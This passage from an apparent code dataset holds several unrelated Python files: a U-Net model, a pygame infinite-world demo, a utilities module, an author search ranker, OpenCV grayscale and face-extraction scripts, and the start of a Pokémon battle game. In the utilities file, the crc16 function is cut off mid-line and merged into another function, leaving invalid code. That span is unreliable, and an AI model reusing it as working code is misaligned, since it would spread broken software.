torch.cat([up_8, c2], dim=1)\n c8 = self.conv8(merge8)\n up_9 = self.up9(c8)\n merge9 = torch.cat([up_9, c1], dim=1)\n c9 = self.conv9(merge9)\n c10 = self.conv10(c9)\n # out = nn.Sigmoid()(c10)\n\n c11 = self.conv11(c10)\n p11 = self.pool11(c11)\n c12 = self.conv12(p11)\n p12 = self.pool12(c12)\n c13 = self.conv13(p12)\n p13 = self.pool13(c13)\n c14 = self.conv14(p13)\n p14 = self.pool14(c14)\n c15 = self.conv15(p14)\n up_16 = self.up16(c15)\n # print('every_size',c15.shape,up_16.shape, c14.shape,p14.shape)\n merge16 = torch.cat([up_16, c14], dim=1)\n c16 = self.conv16(merge16)\n up_17 = self.up17(c16)\n merge17 = torch.cat([up_17, c13], dim=1)\n c17 = self.conv17(merge17)\n up_18 = self.up18(c17)\n merge18 = torch.cat([up_18, c12], dim=1)\n c18 = self.conv18(merge18)\n up_19 = self.up19(c18)\n merge19 = torch.cat([up_19, c11], dim=1)\n c19 = self.conv19(merge19)\n c20 = self.conv20(c19)\n\n res=c20.permute(0, 2, 3, 1)\n res=res.contiguous().view(-1, 2)\n out = torch.softmax(res,dim=1)\n\n return out\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"unet_cascade.py","file_name":"unet_cascade.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"271999596","text":"import pygame as pg\nimport unit\nimport chunk as ch\nimport sys\nimport camera\nimport math\nimport threading\nimport worldgen\n\nimport CONSTS\n\nclass World():\n\n def __init__(self, size):\n pg.init()\n self.ssize = size\n self.screen = pg.display.set_mode((size[0], size[1]))\n pg.display.set_caption(\"It goes on.\")\n self.clock = pg.time.Clock()\n\n self.world_generator = worldgen.WorldGenerator()\n self.loaded = []\n self.player = unit.Player((0,0))\n self.heroes = [self.player]\n self.camera = camera.Camera((int(-size[0]/2),int(-size[0]/2)))\n\n self.chunker_ready = False\n\n\n def display(self):\n for chunk in self.loaded:\n worldPos = chunk.pos[0]*CONSTS.SIZE, chunk.pos[1]*CONSTS.SIZE\n try:\n self.screen.blit(chunk.surface, self.camera.apply(worldPos))\n except AttributeError:\n print(\"chunk.surface does not exist, maybe generating\")\n\n pg.display.flip()\n\n def update(self):\n self.clock.tick(60)\n\n def chunker(self, heroes, maximum):\n for hero in heroes:\n for chunk in self.loaded:\n distance = max(abs(hero.wpos[0] - chunk.pos[0]), abs(hero.wpos[1] - chunk.pos[1]))\n\n if distance > maximum:\n self.unload(chunk)\n\n for i in range(-maximum, maximum + 1):\n for j in range(-maximum, maximum + 1):\n self.load((hero.wpos[0] + i, hero.wpos[1] + j))\n\n def load(self, pos):\n for chunk in self.loaded:\n if chunk.pos == pos:\n return None\n else:\n self.loaded.append(ch.Chunk(CONSTS.SIZE, pos, self.world_generator))\n\n def unload(self, chunk):\n self.loaded.remove(chunk)\n\n def playerUpdate(self, left, right, up, down):\n if left:\n self.player.update((self.player.pos[0] - 1, self.player.pos[1]))\n if right:\n self.player.update((self.player.pos[0] + 1, self.player.pos[1]))\n if up:\n self.player.update((self.player.pos[0], self.player.pos[1] - 1))\n if down:\n self.player.update((self.player.pos[0], self.player.pos[1] + 1))\n\n def cameraUpdate(self, target):\n self.camera.update((target.pos[0] + int(-self.ssize[0]/2 + CONSTS.SIZE/2), target.pos[1] + int(-self.ssize[0]/2 + CONSTS.SIZE/2)))\n\n def run(self):\n self.running = True\n left, right, up, down = False, False, False, False\n\n threading.Thread(target=self.chunkerThread).start()\n while self.running:\n for event in pg.event.get():\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_LEFT:\n left = True\n if event.key == pg.K_RIGHT:\n right = True\n if event.key == pg.K_UP:\n up = True\n if event.key == pg.K_DOWN:\n down = True\n\n if event.type == pg.KEYUP:\n if event.key == pg.K_LEFT:\n left = False\n if event.key == pg.K_RIGHT:\n right = False\n if event.key == pg.K_UP:\n up = False\n if event.key == pg.K_DOWN:\n down = False\n if event.type == pg.QUIT:\n self.running = False\n sys.exit(0)\n\n self.screen.fill((0,0,0))\n\n self.chunker_ready = True\n self.playerUpdate(left, right, up, down)\n self.cameraUpdate(self.player)\n self.display()\n self.update()\n\n def chunkerThread(self):\n while self.running:\n if self.chunker_ready:\n self.chunker(self.heroes, CONSTS.MAXIMUM_RANGE)\n self.chunker_ready = False\n else:\n pass\n","sub_path":"infinite_world/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"373105589","text":"# -*- coding: utf-8 -*-\n\n\"\"\"common APIs\nby Kobe Gong 2017-8-21\nuse:\n all the funcs can be used by any module should be here\n\"\"\"\n\nimport binascii\nimport functools\nimport hashlib\nimport os\nimport re\nimport socket\nimport struct\nimport sys\nfrom binascii import unhexlify\nfrom subprocess import *\nimport time\n\nimport crcmod.predefined\n\n'''\ndef file_lock(open_file):\n return fcntl.flock(open_file, fcntl.LOCK_EX | fcntl.LOCK_NB)\n\ndef file_unlock(open_file):\n return fcntl.flock(open_file, fcntl.LOCK_UN)\n'''\n\n\ndef get_output(*popenargs, **kwargs):\n process = Popen(*popenargs, stdout=PIPE, **kwargs)\n output, unused_err = process.communicate()\n retcode = process.poll()\n return output\n\n\ndef full_output(*popenargs, **kwargs):\n process = Popen(*popenargs, **kwargs)\n output, unused_err = process.communicate()\n retcode = process.poll()\n return output\n\n\n# run a cmd and check exec result\ndef my_system(*cmd):\n return check_output(*cmd, universal_newlines=True, shell=True)\n\n\n# run a cmd without check exec result\ndef my_system_no_check(*cmd):\n print('run:' + cmd[0])\n return get_output(*cmd, universal_newlines=True, shell=True)\n\n\n# run a cmd without check exec result\ndef my_system_full_output(*cmd):\n print('run:' + cmd[0])\n return full_output(*cmd, universal_newlines=True, shell=True)\n\n\ndef register_caseid(casename):\n def cls_decorator(cls):\n def __init__(self, config_file='C:\\\\ATS\\\\config.ini', case_id='xxxxxxxx'):\n super(cls, self).__init__(case_id=casename.split('_')[1])\n\n cls.__init__ = __init__\n return cls\n\n return cls_decorator\n\n\n# get all the files match regex 'file_re' from a dir\ndef get_file_by_re(dir, file_re):\n file_list = []\n if os.path.exists(dir):\n pass\n else:\n print(dir + ' not exist!\\n')\n return file_list\n\n all_things = os.listdir(dir)\n\n for item in all_things:\n if os.path.isfile(os.path.join(dir, os.path.basename(item))) and re.match(file_re, item, re.S):\n file_list.append(os.path.join(dir, os.path.basename(item)))\n\n elif os.path.isdir(os.path.join(dir, os.path.basename(item))):\n file_list += get_file_by_re(os.path.join(dir,\n os.path.basename(item)), file_re)\n\n else:\n continue\n\n return file_list\n\n\n# use to copy a dir to another dir\ndef dir_copy(source_dir, target_dir):\n for f in os.listdir(source_dir):\n sourceF = os.path.join(source_dir, f)\n targetF = os.path.join(target_dir, f)\n\n if os.path.isfile(sourceF):\n # 创建目录\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n\n # 文件不存在,或者存在但是大小不同,覆盖\n if not os.path.exists(targetF) or (\n os.path.exists(targetF) and (os.path.getsize(targetF) != os.path.getsize(sourceF))):\n # 2进制文件\n open(targetF, \"wb\").write(open(sourceF, \"rb\").read())\n else:\n pass\n\n elif os.path.isdir(sourceF):\n dir_copy(sourceF, targetF)\n\n\n# use to make a dir standard\ndef dirit(dir):\n if not dir.endswith(os.path.sep):\n dir += os.path.sep\n\n return re.sub(r'%s+' % (re.escape(os.path.sep)), re.escape(os.path.sep), dir, re.S)\n\n\n# use to add lock befow call the func\ndef need_add_lock(lock):\n def sync_with_lock(func):\n @functools.wraps(func)\n def new_func(*args, **kwargs):\n lock.acquire()\n try:\n return func(*args, **kwargs)\n finally:\n lock.release()\n\n return new_func\n\n return sync_with_lock\n\n\n# Hex print\ndef protocol_data_printB(data, title=''):\n if isinstance(data, type(b'')):\n pass\n else:\n data = data.encode('utf-8')\n ret = title + ' %s bytes:' % (len(data)) + '\\n\\t\\t'\n counter = 0\n for item in data:\n if isinstance('', type(b'')):\n ret += '{:02x}'.format(ord(item)) + ' '\n else:\n ret += '{:02x}'.format(item) + ' '\n counter += 1\n if counter == 10:\n ret += ' ' + '\\n\\t\\t'\n counter -= 10\n\n return ret\n\n\n# create CRC\ndef crc(s):\n result = 0\n for i in range(len(s)):\n result += struct.unpack('B', s[i])[0]\n\n result %= 0xff\n return struct.pack('B', result)\n\n\n# create CRC16\ndef crc16(data, reverse=False):\n if isinstance(data, type(b'')):\n pass\n else:\n data = data.encode('utf-8')\n a = binascii.b2a_hex(data)\n s = unhexlify(a)\n crc16 = crcmod.predefined.Crc('crc-ccitt-false')\n crc16.update(s)\n if reverse == False:\n return struct.pack('>H', crc16.crcValue)\n else:\n return struct.pack(' int(max_str):\n max_str = item\n return max_str\n\n\ndef chinese_show(data):\n coding = sys.getfilesystemencoding()\n if isinstance('', type(u'')):\n tmp_data = data\n else:\n tmp_data = data.decode('utf-8').encode(coding)\n\n return tmp_data\n\n\ndef get_local_ipv4():\n addrs = socket.getaddrinfo(socket.gethostname(), None)\n return [item[4][0] for item in addrs if ':' not in item[4][0]]\n\n\ndef bit_set(byte, bit):\n temp = struct.unpack('B', byte)[0]\n temp = temp | (1 << bit)\n return struct.pack('B', temp)\n\n\ndef bit_get(byte, bit):\n temp = struct.unpack('B', byte)[0]\n return (temp & (1 << bit))\n\n\ndef bit_clear(byte, bit):\n temp = struct.unpack('B', byte)[0]\n temp = temp & ~(1 << bit)\n return struct.pack('B', temp)\n\n\nclass msgs_info:\n def __init__(self, name, msg, num):\n self.name = name\n self.msg = msg\n self.num = num\n\n\nclass msgst_time_info:\n def __init__(self):\n self.now = lambda: time.time()\n # 当前发包时间\n self.start: float = 0\n # 总时延\n self.total_delay_s = 0\n # 计入平均时延的总包数\n self.delay_pkt_count: int = 0\n # 重置发包时间为0的次数\n self.reset_count = 0\n # 收包时候遇到发包时间为0的次数\n self.ignore_send_count = 0\n # 平均时延保留的小数位数\n self.digit_num = 4\n\n def send_update(self):\n # 发送时间存在,意味着上个包还木有回包,重置发送时间后重置计数+1\n if self.start != 0:\n self.reset_count += 1\n self.start = self.now()\n\n def recv_update(self):\n # 如果木有发送时间,意味着先收到此命令,模拟器只需要回复命令即可,不需要计算时延,忽略次数+1\n if self.start == 0:\n self.ignore_send_count += 1\n else:\n self.total_delay_s = self.total_delay_s + self.now() - self.start\n self.start = 0\n self.delay_pkt_count += 1\n\n def get_avg_delay_s(self):\n if self.delay_pkt_count == 0:\n return 0\n return round(self.total_delay_s / self.delay_pkt_count, self.digit_num)\n\n def __add__(self, other):\n if isinstance(other, msgst_time_info):\n new_obj = msgst_time_info()\n new_obj.delay_pkt_count = self.delay_pkt_count + other.delay_pkt_count\n new_obj.total_delay_s = self.total_delay_s + other.total_delay_s\n new_obj.reset_count = self.reset_count + other.reset_count\n new_obj.ignore_send_count = self.ignore_send_count + other.ignore_send_count\n return new_obj\n else:\n raise NotImplementedError(\"Not support type {}\".format(type(other)))\n\n def __str__(self):\n tmp_str = \"total_delay_s:{} avg_count:{} avg_delay_s:{}\".format(self.total_delay_s, self.delay_pkt_count,\n self.get_avg_delay_s())\n if self.reset_count != 0:\n tmp_str += \" reset_count:{}\".format(self.reset_count)\n if self.ignore_send_count != 0:\n tmp_str += \" ignore_send_count:{}\".format(self.ignore_send_count)\n return tmp_str\n\n def reset(self):\n self.now = lambda: time.time()\n # 当前发包时间\n self.start: float = 0\n # 总时延\n self.total_delay_s = 0\n # 计入平均时延的总包数\n self.delay_pkt_count: int = 0\n # 重置发包时间为0的次数\n self.reset_count = 0\n # 收包时候遇到发包时间为0的次数\n self.ignore_send_count = 0\n # 平均时延保留的小数位数\n self.digit_num = 4\n\n\nif __name__ == '__main__':\n t1 = msgst_time_info()\n t1.delay_pkt_count = 3\n t1.avg_delay_s = 2\n print(\"t1=\", t1)\n t2 = msgst_time_info()\n t2 += t1\n print(\"t2=\", t2)\n t2 += t1\n print(\"t2=\", t2)\n exit(666)\n print(crc16(b'12345678'))\n print(crc16(b'1234567890'))\n","sub_path":"smartDev/APIs/common_APIs.py","file_name":"common_APIs.py","file_ext":"py","file_size_in_byte":9023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275684882","text":"from ranker import topic_z_scorer\nfrom para_terms import searcher \nfrom sklearn.feature_extraction.text import TfidfVectorizer as tfidf\n\ndef combine_z(z_1,z_2):\n\t# print(\"to combine_z\")\n\tif not z_2:\n\t\treturn z_1\n\t# print('combining')\n\tfor key in z_2.keys():\n\t\t# print(key)\n\t\tif key in z_1.keys():\n\t\t\tz_1[key]+=z_2[key]\n\t\telse:\n\t\t\tz_1[key]=z_2[key]\n\treturn z_1\n\ndef search(query):\n\tkey_terms=searcher(query)\n\ttermlist=[]\n\tprint(key_terms)\n\tif not key_terms:\n\t\t# print(\"here\")\n\t\tkey_terms=tfidf().build_tokenizer()(query)\n\t# print(key_terms)\n\tranked={}\n\tfor term in key_terms:\n\t\tif term not in termlist:\n\t\t\tranks,authrs=topic_z_scorer(term)\n\t\t\tif not ranked:\n\t\t\t\tranked=authrs\n\t\t\telse:\n\t\t\t\tranked=combine_z(ranked,authrs)\n\t\t\ttermlist.append(term)\n\t\t# print(ranked,authrs)\n\tfor term in key_terms:\n\t\tsub_terms=tfidf().build_tokenizer()(query)\n\t\tfor sub_term in sub_terms:\n\t\t\tif sub_term not in termlist:\n\t\t\t\tranks,authrs=topic_z_scorer(sub_term)\n\t\t\t\tauthrs={auth:authrs[auth]*0.75 for auth in authrs}\n\t\t\t\tif not ranked:\n\t\t\t\t\tranked=authrs\n\t\t\t\telse:\n\t\t\t\t\tranked=combine_z(ranked,authrs)\n\t\t\t\ttermlist.append(sub_term)\n\n\tfor term in tfidf().build_tokenizer()(query):\n\t\tfor word in tfidf().build_tokenizer()(term):\n\t\t\tif word not in termlist:\n\t\t\t\tranks,authrs=topic_z_scorer(word)\n\t\t\t\tauthrs={auth:authrs[auth]*1.25 for auth in authrs}\n\t\t\t\tif not ranked:\n\t\t\t\t\tranked=authrs\n\t\t\t\telse:\n\t\t\t\t\tranked=combine_z(ranked,authrs)\n\t\t\t\ttermlist.append(word)\n\n\tranks_final=sorted([(ranked[key],key) for key in ranked.keys()])\n\tranks_final.reverse()\n\tprint(ranks_final)\n\treturn [name[1] for name in ranks_final]\n\nif __name__ == '__main__':\n\timport sys\n\t# print(sys.argv[1])\n\tif len(sys.argv) > 1:\n\t\tfor name in search(sys.argv[1])[:10]:\n\t\t\tprint(name)\n\telse:\n\t\tfor name in search(\"Coronary Heart Disease\")[:10]:\n\t\t\tprint(name)\n\n","sub_path":"search_long.py","file_name":"search_long.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"7426928","text":"from numpy import *\nfrom gfpersist import *\n\ndef load_recarray(filepath, select, headers, filter=None):\n records = []\n pc = PersistanceContainer(filepath)\n for p in pc.read_all():\n if (not filter) or filter(p):\n records.append(select(p))\n \n if not records:\n return None\n else:\n return rec.fromrecords(records, names=headers)\n\n\n","sub_path":"py-core/goodfather/gfnumpy.py","file_name":"gfnumpy.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"119307654","text":"# ESZA019−17 − Visao Computacional − NA − 2Q2019\r\n# PRATICA 01\r\n#\r\n# RA: 11039113\r\n# NOME: Matheus E. S. Araújo\r\n#\r\n# E−MAIL: matheus.esa17@gmail.com\r\n# Git-Hub: https://github.com/MatheusESAraujo/Visao_computacional\r\n#\r\n# DESCRICAO:\r\n# − Neste código é realizada a captura de imagens, após isso as imagens são salvas no formato jpg e bmp e transformadas em escala de cinza;\r\n# - Para a transformação em escala de cinza é utilizada a função: cv.cvtColor(frame,cv.COLOR_BGR2GRAY);\r\n# - Além disso a imagem também é transformada utilizando os parametros alfa,beta e gama definidos;\r\n# - Para aplicar a ponderação é utilizada a função: cv.split(frame) - ela separa a imagem em cada cor para depois aplicar a soma ponderada\r\n\r\nimport numpy as np\r\nimport cv2 as cv\r\n\r\ncap = cv.VideoCapture(0)\r\n\r\nfourcc = cv.VideoWriter_fourcc(*'XVID')\r\n\r\nalfa=0.2989 #Parametro para ponderação do canal vermelho na escala de cinza\r\nbeta=0.5870 #Parametro para ponderação do canal verde na escala de cinza\r\ngama=0.1140 #Parametro para ponderação do canal Azul na escala de cinza\r\n\r\n\r\nwhile(cap.isOpened()):\r\n ret,frame = cap.read()\r\n if ret == True:\r\n # out.write(frame)\r\n\r\n cv.imshow('frame',frame)\r\n cv.imwrite(\"Imagens_e_videos/Photo12.JPG\",frame)\r\n cv.imwrite(\"Imagens_e_videos/Photo12.bmp\",frame)\r\n gray = cv.cvtColor(frame,cv.COLOR_BGR2GRAY)\r\n cv.imwrite(\"Imagens_e_videos/Photo12__gray_funcao.JPG\",gray)\r\n cv.imwrite(\"Imagens_e_videos/Photo12__gray_funcao.bmp\",gray)\r\n (canalAzul, canalVerde, canalVermelho) = cv.split(frame) #Separa a imagem em cada canal de cor\r\n cv.imwrite(\"Imagens_e_videos/Photo12_gray_pond.jpg\", (alfa*canalVermelho+beta*canalVerde+gama*canalAzul)) #Aplica o peso de alfa,beta e gama sobre cada canal\r\n cv.imwrite(\"Imagens_e_videos/Photo12_gray_pond.bmp\", (alfa*canalVermelho+beta*canalVerde+gama*canalAzul)) #Aplica o peso de alfa,beta e gama sobre cada canal\r\n\r\n if cv.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n else:\r\n break\r\n\r\ncap.release()\r\n# out.release()\r\ncv.DestroyAllWindows()\r\n\r\n\r\n\r\n","sub_path":"Lab01/Atv_a1_p2.py","file_name":"Atv_a1_p2.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475881479","text":"import random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\npath = os.getcwd()\n\ndef bernouli(p, k):\n return p if k else (1-p)\n\nif __name__ == '__main__':\n n_experiment = 100\n p = 0.6\n x = np.arange(n_experiment)\n y = []\n for _ in range(n_experiment):\n pick = bernouli(p, k=bool(random.getrandbits(1)))\n y.append(pick)\n\n u, s = np.mean(y), np.std(y)\n plt.scatter(x, y, label=r'$\\mu=%.2f,\\ \\sigma=%.2f$' % (u, s))\n plt.legend()\n plt.savefig(path + '/bernouli.png')\n plt.show()","sub_path":"bernoulli.py","file_name":"bernoulli.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"273196027","text":"# USAGE\n# python extract.py --output outputDir/ --input someDir/\n# python extract.py --output outputDir/ --input image.png\n# python extract.py --output outputDir/ --input video.mp4\n\nimport os\nimport cv2\nimport argparse\nimport filetype\nimport cvlib as cv\n\ndef main(args):\n input = args[\"input\"]\n isDirectory = os.path.isdir(input)\n sources = []\n if isDirectory:\n files = []\n for path in os.listdir(input):\n file = os.path.join(input, path)\n if os.path.isfile(file):\n files.append(file)\n sources.extend(files)\n else:\n sources.append(input)\n\n images = []\n for path in sources:\n kind = filetype.guess(path)\n if kind is None:\n continue\n if kind.mime.startswith('video'):\n print('[INFO] extracting frames from video...')\n video = cv2.VideoCapture(path)\n while True:\n success, frame = video.read()\n if success:\n image = {\n \"file\": frame,\n \"source\": path,\n \"sourceType\": \"video\",\n \"filename\": os.path.splitext(os.path.basename(path))[0]\n }\n images.append(image)\n else:\n break\n video.release()\n cv2.destroyAllWindows()\n elif kind.mime.startswith('image'):\n image = {\n \"file\": cv2.imread(path),\n \"source\": path,\n \"sourceType\": \"image\",\n \"filename\": os.path.splitext(os.path.basename(path))[0]\n }\n images.append(image)\n\n cwd = os.getcwd()\n outputDir = os.path.join(cwd, args[\"output\"])\n if not os.path.exists(outputDir):\n os.makedirs(outputDir)\n\n total = 0\n for (i, image) in enumerate(images):\n print(\"[INFO] processing image {}/{}\".format(i + 1, len(images)))\n\n results, confidences = cv.detect_face(image[\"file\"]) \n \n for (j, bounds) in enumerate(results):\n (startX, startY, endX, endY) = bounds\n face = image[\"file\"][startY:endY, startX:endX]\n (fH, fW) = face.shape[:2]\n \n if fW < 10 or fH < 10:\n continue\n\n outputFilename = ''\n if image[\"sourceType\"] == \"video\":\n outputFilename = '{}_{:04d}_{}.jpg'.format(image[\"filename\"], i, j)\n else:\n outputFilename = '{}_{}.jpg'.format(image[\"filename\"], j)\n outputPath = os.path.join(outputDir, outputFilename)\n cv2.imwrite(outputPath, face)\n total += 1\n\n print(\"[INFO] found {} face(s)\".format(total))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n \n # options\n parser.add_argument(\"-i\", \"--input\", required=True, help=\"path to input directory or file\")\n parser.add_argument(\"-o\", \"--output\", default=\"output\", help=\"path to output directory of faces\")\n \n args = vars(parser.parse_args())\n main(args)","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"68522605","text":"import pygame\r\nfrom pygame.sprite import Group\r\nfrom pokemons import Pokemon\r\nfrom settings import Setting\r\nfrom menubar import Menubar\r\nfrom pointer import Pointer, SelectionPointer\r\nfrom skills import Knock, ShadowBall, Powerup, Lightning, FireBeam, Kirin, Tsunami, Hypnotism, Protection, FireKick, DragonClaw, SabreDance, BulletFist, Yeokrin, Waterfall, IceBeam, Splash\r\nfrom statebar import Statebar, Statebar01, Healthbar\r\nfrom skillmenu import Skillbar\r\nimport game_functions as gf\r\nimport random\r\nimport sys\r\nimport os\r\n\r\n\r\n# import socket\r\n\r\n\r\ndef main():\r\n '''\r\n s = socket.socket()\r\n s.connect(('42.192.86.230', 8712))\r\n print(s.recv(1024).decode(encoding='utf8'))\r\n state = int(s.recv(1024).decode())\r\n s.close()\r\n '''\r\n pygame.init()\r\n state = 0\r\n # 创建 设置 实例\r\n p_setting = Setting()\r\n\r\n # 创建屏幕\r\n screen = pygame.display.set_mode(\r\n (p_setting.screen_width, p_setting.screen_height))\r\n # 绘制背景图像\r\n screen.blit(p_setting.screen_bg, (0, 0))\r\n # 创建菜单栏 对象\r\n menubar = Menubar(p_setting, screen)\r\n\r\n '''\r\n 创建技能\r\n '''\r\n clock = pygame.time.Clock()\r\n # 创建 撞击技能 对象(我方)\r\n knock01 = Knock(p_setting, screen, menubar)\r\n\r\n # 创建 撞击技能 对象(敌方)\r\n knock02 = Knock(p_setting, screen, menubar)\r\n\r\n # 创建 水溅跃技能 对象(敌方)\r\n splash02 = Splash(p_setting, screen, menubar)\r\n\r\n # 创建 影子球技能 对象(我方)\r\n shadowBall01 = ShadowBall(p_setting, screen, menubar)\r\n\r\n # 创建 影子球技能 对象(敌方)\r\n shadowBall02 = ShadowBall(p_setting, screen, menubar)\r\n\r\n # 创建 力量提升技能 对象(我方)\r\n powerup01 = Powerup(p_setting, screen, menubar)\r\n\r\n # 创建 力量提升技能 对象(敌方)\r\n powerup02 = Powerup(p_setting, screen, menubar)\r\n\r\n # 创建 雷击技能 对象(我方)\r\n lightning01 = Lightning(p_setting, screen, menubar)\r\n\r\n # 创建 雷击技能 对象(敌方)\r\n lightning02 = Lightning(p_setting, screen, menubar)\r\n\r\n # 创建 大字爆技能 对象(我方)\r\n fireBeam01 = FireBeam(p_setting, screen, menubar)\r\n\r\n # 创建 大字爆技能 对象(敌方)\r\n fireBeam02 = FireBeam(p_setting, screen, menubar)\r\n\r\n # 创建 麒麟技能 对象(我方)\r\n kirin01 = Kirin(p_setting, screen, menubar)\r\n\r\n # 创建 麒麟技能 对象(敌方)\r\n kirin02 = Kirin(p_setting, screen, menubar)\r\n\r\n # 创建 海啸技能 对象(我方)\r\n tsunami01 = Tsunami(p_setting, screen, menubar)\r\n\r\n # 创建 海啸技能 对象(敌方)\r\n tsunami02 = Tsunami(p_setting, screen, menubar)\r\n\r\n # 创建 催眠术技能 对象(我方)\r\n hypnotism01 = Hypnotism(p_setting, screen, menubar)\r\n\r\n # 创建 保护技能 对象(我方)\r\n protection01 = Protection(p_setting, screen, menubar)\r\n\r\n # 创建 保护技能 对象(敌方)\r\n protection02 = Protection(p_setting, screen, menubar)\r\n\r\n # 创建 火焰踢技能 对象(我方)\r\n fireKick01 = FireKick(p_setting, screen, menubar)\r\n\r\n # 创建 火焰踢技能 对象(敌方)\r\n fireKick02 = FireKick(p_setting, screen, menubar)\r\n\r\n # 创建 龙之爪技能 对象(我方)\r\n dragonClaw01 = DragonClaw(p_setting, screen, menubar)\r\n\r\n # 创建 龙之爪技能 对象(敌方)\r\n dragonClaw02 = DragonClaw(p_setting, screen, menubar)\r\n\r\n # 创建 剑舞技能 对象(我方)\r\n sabreDance01 = SabreDance(p_setting, screen, menubar)\r\n\r\n # 创建 剑舞技能 对象(敌方)\r\n sabreDance02 = SabreDance(p_setting, screen, menubar)\r\n\r\n # 创建 子弹拳技能 对象(我方)\r\n bulletFist01 = BulletFist(p_setting, screen, menubar)\r\n\r\n # 创建 子弹拳技能 对象(敌方)\r\n bulletFist02 = BulletFist(p_setting, screen, menubar)\r\n\r\n # 创建 逆鳞技能 对象(我方)\r\n yeokrin01 = Yeokrin(p_setting, screen, menubar)\r\n\r\n # 创建 逆鳞技能 对象(敌方)\r\n yeokrin02 = Yeokrin(p_setting, screen, menubar)\r\n\r\n # 创建 攀瀑技能 对象(我方)\r\n waterfall01 = Waterfall(p_setting, screen, menubar)\r\n\r\n # 创建 攀瀑技能 对象(敌方)\r\n waterfall02 = Waterfall(p_setting, screen, menubar)\r\n\r\n # 创建 急冻光束技能 对象(我方)\r\n iceBeam01 = IceBeam(p_setting, screen, menubar)\r\n\r\n # 创建 急冻光束技能 对象(敌方)\r\n iceBeam02 = IceBeam(p_setting, screen, menubar)\r\n\r\n # skills01=\r\n '''\r\n 蛇纹熊初始化 0\r\n '''\r\n # 创建 我方蛇纹熊\r\n Zigzagoon01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Zigzagoon01.png\", \"../othersource/Pic/headPortraits/Zigzagoon01.png\",\r\n 1, '蛇纹熊', 50, 100, 20, 20, 50, 0, 20, 70, 118)\r\n Zigzagoon01.orderPos = (50, 110)\r\n\r\n # 创建 野生蛇纹熊\r\n Zigzagoon02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Zigzagoon02.png\", None, 2, '蛇纹熊',\r\n 100, 100, 20, 20, 50, 0, 20, 637, 50)\r\n\r\n # 创建 技能组 对象\r\n Zigzagoon01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Zigzagoon02.skills = (knock02, shadowBall02, powerup02, lightning02)\r\n\r\n '''\r\n 裂空座初始化 1\r\n '''\r\n # 创建 我方裂空座\r\n Rayquaza01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Rayquaza01.png\", \"../othersource/Pic/headPortraits/Rayquaza01.png\", 1, '裂空座',\r\n 400, 400, 120, 100, 150, 0, 70, 70, 80)\r\n Rayquaza01.orderPos = (174, 110)\r\n\r\n # 创建 野生裂空座\r\n Rayquaza02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Rayquaza02.png\", None, 2, '裂空座',\r\n 10, 400, 120, 100, 150, 0, 70, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Rayquaza01.skills = (dragonClaw01, sabreDance01, yeokrin01, kirin01)\r\n Rayquaza02.skills = (dragonClaw02, sabreDance02, yeokrin02, kirin02)\r\n\r\n '''\r\n 裂空座初始化结束\r\n '''\r\n\r\n '''\r\n 火鸡战士初始化 2\r\n '''\r\n # 创建 我方火鸡战士\r\n Blaziken01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Blaziken01.png\", \"../othersource/Pic/headPortraits/Blaziken01.png\", 1, '火鸡战士',\r\n 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n Blaziken01.orderPos = (298, 110)\r\n\r\n # 创建 野生火鸡战士\r\n Blaziken02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Blaziken02.png\", None, 2, '火鸡战士',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # 创建 技能组 对象\r\n Blaziken01.skills = (protection01, fireKick01, powerup01, fireBeam01)\r\n Blaziken02.skills = (protection02, fireKick02, powerup02, fireBeam02)\r\n\r\n '''\r\n 火鸡战士初始化结束\r\n '''\r\n\r\n '''\r\n 炎帝初始化 \r\n '''\r\n # 创建 野生炎帝\r\n Entei02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Entei02.png\", None, 2, '炎帝',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方炎帝 无图\r\n # Entei01 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Entei01.png\", 1, '炎帝',\r\n # 400, 400, 120, 100, 150, 0, 20, 70, 80)\r\n\r\n # 创建 技能组 对象\r\n # Entei01.skills = (knock01, shadowBall01, powerup01, lightning01)\r\n Entei02.skills = (protection02, fireKick02, powerup02, fireBeam02)\r\n\r\n '''\r\n 炎帝初始化结束\r\n '''\r\n\r\n '''\r\n 灾兽初始化 \r\n '''\r\n # 创建 野生灾兽\r\n Absol02 = Pokemon(p_setting, screen, clock, menubar, \"../othersource/Pic/Absol02.png\", None, 2, '灾兽',\r\n 400, 400, 120, 100, 150, 0, 20, 637, 10)\r\n\r\n # # 创建 我方灾兽 无图\r\n # Absol01 = 